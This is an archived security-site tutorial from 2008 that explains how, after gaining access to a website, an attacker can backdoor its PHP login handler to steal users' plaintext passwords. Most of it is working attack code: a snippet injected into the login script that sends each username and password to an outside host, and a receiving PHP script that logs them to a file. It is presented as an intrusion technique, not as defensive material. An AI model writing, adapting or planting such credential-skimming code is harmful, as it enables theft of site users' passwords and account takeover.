exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Password Ganking By Modifying PHP Code

Password Ganking By Modifying PHP Code
Posted Dec 30, 2008
Authored by Rohit Bansal

Brief login form password theft tutorial showing how to backdoor php code once access has been gained to a system in order to not have to crack hashes.

tags | paper, php
SHA-256 | efa9a5d70d121d1cd4ee5fd03891f3e0b9ec2ada0da46b4dc78a39dbc6a542b5

Password Ganking By Modifying PHP Code

Change Mirror Download
---------------------------------------------------------------------------------------
[+] Login Form Password Stealing - Tutorial
[+] Author: Rohit Bansal

---------------------------------------------------------------------------------------

Intro:
It seems that alot of people these days are gaining shell access,
downloading a database
then attempting to crack the hashes. If they are salted, sha1 or a hard to
crack plain
ole' MD5, they start bitchin and moaning when they can't get the plain text.
So here it
is, a tutorial on how to get user:pass format in plain text of ANY hash
type.

Method:
Modify the login form of a site to catch the password remotely, before it is
encrypted. I
will explain this more simply via an example.

Take the following login form for example,
<form method="post" action="cookies.php"><hr />
<p>User: <input type="text" class="buttonstyle" name="username"></p>
<p>Pass: <input type="password" class="buttonstyle" name="password"></p>
<p><input type="submit" value="Login" class="buttonstyle" name="submit">
<input type="reset" value="Reset" class="buttonstyle" /></p>
</form>

Now we can see that the action of this form points to 'cookies.php'. Now
cookies.php
will probably include a function similar to this depending on the encryption
type, etc.
$user = $_POST['username'];
$pass = $_POST['password'];
if(md5($user) == $usermd5 && md5($pass) == $passmd5){
setcookie("Whatever", $cookie, time()+3600, "/");
header("Location: index.php");
die();
}

Now on to bypassing the encryption before it happens, thus gaining the
username and
password in plain text we need to edit the 'cookie.php' site, add the
following code at
the start of the php tags.
<?php
$user = $_POST['username'];
$pass = $_POST['password'];
file_get_contents("http://site.com/plain.php?user=
".$user."&pass=".$pass."");
?>

Now the php file 'plain.php' will include the following code:
<?php
$user = $_GET['user'];
$pass = $_GET['pass'];
$file = "lol.txt";
$fp = fopen($file, "a");
fputs($fp, "$user:$pass\n");
fclose($fp);
?>

Notice you will also need to upload a file 'lol.txt', and chmod it to 777.

Conclusion:
Now everytime a user logs into the site you are editing the code of, it will
send the
username and password to the 'plain.php' text file and save it in 'log.txt',
on a remote
server in theformat of:
user:pass

---------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap, Infysec
---------------------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close